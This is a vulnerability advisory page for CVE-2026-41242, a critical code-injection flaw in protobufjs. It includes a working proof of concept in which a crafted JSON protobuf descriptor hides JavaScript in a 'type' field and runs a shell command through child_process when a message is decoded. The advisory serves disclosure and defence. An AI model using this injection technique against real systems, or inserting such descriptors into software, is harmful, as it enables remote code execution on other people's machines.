Sign In

CVE-2026-41242

ADVISORY - github

Summary

Summary

protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.

Details

Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.

PoC

const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
    const user = UserType.decode(userBytes);
} catch (e) {}

Impact

Remote code execution when attackers can control the protobuf definition files.

Common Weakness Enumeration (CWE)

ADVISORY - nist

CWE-94

Improper Control of Generation of Code ('Code Injection')

ADVISORY - github

CWE-94

Improper Control of Generation of Code ('Code Injection')

Impacted images

Advisories

NIST

CREATED

UPDATED

ADVISORY IDCVE-2026-41242
EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CWE-94

CVSS SCORE

9.4critical

GitHub

CREATED

UPDATED

ADVISORY IDGHSA-xq3m-2v4x-88gg
EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CWE-94

CVSS SCORE

9.4critical

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-wfv4-wm69-gcc3

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY